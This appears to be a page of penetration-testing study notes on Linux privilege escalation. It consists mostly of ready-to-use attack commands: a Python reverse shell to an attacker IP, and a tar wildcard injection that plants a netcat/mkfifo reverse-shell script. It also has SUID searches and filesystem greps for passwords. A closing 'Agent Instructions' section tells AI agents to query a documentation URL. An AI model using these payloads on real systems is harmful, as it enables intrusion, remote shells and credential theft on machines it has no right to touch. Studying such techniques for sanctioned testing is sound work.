# Linux Privilege Escalation

## Get tty (text terminal)

Create another netcat listener as below

```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell.

```python
python -c 'import pty; pty.spawn("/bin/bash")'

or 

python3 -c 'import pty; pty.spawn("/bin/bash")'
```

```bash
export TERM=xterm // give us access to term commands such as clear.
```

**Optional** if phase 2 not make the job done. Press CTRL+Z to put the shell in the background. Next, type this command in the same window: `stty raw -echo;fg`. This will bring your shell back to the foreground with a fully interactive experience.

<https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys>

## Gather Infos and spiking

`history` check users, architecture and services

`su user` login with another user

`sudo -l` check what files current user could run as root

`cat /etc/crontab` `crontab -l` cron is your friend

`ls -l /bin/bash` `/bin/bash -p` an easy win

`sudo -u user command` run command as other users

<https://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/><https://www.oreilly.com/library/view/linux-security-cookbook/0596003919/ch05s03.html>

## Exploiting SUID Executables(bash, binary)

```bash
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner
find / -perm /4000 -type f 2>/dev/null   # Using the chmod number
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
```

## Exploit tar wildcards

<https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/>

```bash
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip>
4242 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```

## Automatic tools and observe

`./linpeas.sh | tee linlog.txt` or [pspy](https://github.com/DominicBreuker/pspy)

## Other Dirty Tricks

```bash
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2>/dev/null
```

```bash
locate password | more
```

## Expand knowledge and cheatsheet

* <https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md>
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
* <https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html>
* <https://payatu.com/guide-linux-privilege-escalation>
* <https://tryhackme.com/room/linuxprivesc>
* <https://gtfobins.github.io/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alvinsmith.gitbook.io/progressive-oscp/linux-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.